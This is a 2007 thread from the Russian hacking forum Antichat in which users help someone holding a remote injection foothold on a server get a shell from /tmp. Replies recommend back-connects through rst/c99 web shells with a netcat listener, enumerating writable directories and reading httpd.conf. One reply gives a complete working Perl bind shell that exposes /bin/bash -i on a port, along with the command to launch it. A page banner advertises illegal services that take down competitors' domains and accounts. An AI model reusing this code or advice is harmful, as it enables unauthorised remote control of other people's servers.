Форум АНТИЧАТ - Проблема с шеллом

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Проблема с шеллом

Опции темы

Поиск в этой теме

Опции просмотра

Проблема с шеллом

03.09.2007, 18:38

Termin@L

Участник форума

Регистрация: 07.12.2006

Сообщений: 192

Провел на форуме:
492591

Репутация: 123

Проблема с шеллом

Есть ремоте инъекция, но папка которую можно читать только одна, запись соответственно в неё запрещена, разрешена только в /tmp, можно как-нибудь оттуда запустить bind script?

03.09.2007, 18:47

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

тебе лучше воспользоваться бэкконектом
rst и некоторые версии c99 шеллов запускают бэкконект из /tmp и если у тебя свободен 80 порт (не стоит на нем какойнить веб сервак), то в неткате лучше открывать именно его (nc -l -n -v -p 80) и соответственно бэкконект делать на этот порт, т.к. соединение сервера с другими портами может быть запрещено политикой безопасности...

ЗЫ да, имхо если включено safemode, то врядли чтото получится...

ЗЗЫ из шелла (если нет safemode и нет openbasedir) выполни команду

Код:

find / -type d -perm -2

мож всеже есть папки в которые ты можешь записывать...

найди httpd.conf и если прочитаешь, можешь увидеть пути к другим в.хостам

__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 04.09.2007 в 07:40..

03.09.2007, 20:24

Goudini

Участник форума

Регистрация: 07.06.2006

Сообщений: 146

Провел на форуме:
1652093

Репутация: 490

Отправить сообщение для Goudini с помощью ICQ

Конечно можно

Код:

#!/usr/bin/perl
$SHELL="/bin/bash -i";
if (@ARGV < 1) { exit("mda"); }
$LISTEN_PORT=$ARGV[0];
use Socket;
$protocol=getprotobyname('tcp');
socket(S,&PF_INET,&SOCK_STREAM,$protocol) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1)
{
accept(CONN,S);
if(!($pid=fork))
{
die "Cannot fork" if (!defined $pid);
open STDIN,"<&CONN";
open STDOUT,">&CONN";
open STDERR,">&CONN";
exec $SHELL || die print CONN "Cant execute $SHELL\n";
close CONN;
exit 0;
}
}

cd /tmp; perl bind.pl 31337

или через через функции r57shell

04.09.2007, 07:23

The_HuliGun

Участник форума

Регистрация: 19.05.2007

Сообщений: 228

Провел на форуме:
4325663

Репутация: 240

Отправить сообщение для The_HuliGun с помощью ICQ

Цитата:

как-нибудь оттуда запустить bind script

Если ты попробувал, и у тебя не получилось, скорее всего фаер порубал соедининие.

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Проблема с шеллом rst	_Sniper_	Болталка	6	16.08.2007 18:22
Проблема с icq	reider	ICQ	6	16.08.2007 14:47
Ipb 2.1.6 проблема с шеллом	=XSS=	Форумы	17	26.11.2006 11:31
Проблема с шеллом	}{0TT@БЬ)Ч	Уязвимости	10	16.04.2006 22:04
Проблема с перл Эксплойтом для ipb 2.0.*	SURRENDER	Форумы	2	07.12.2004 12:58

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход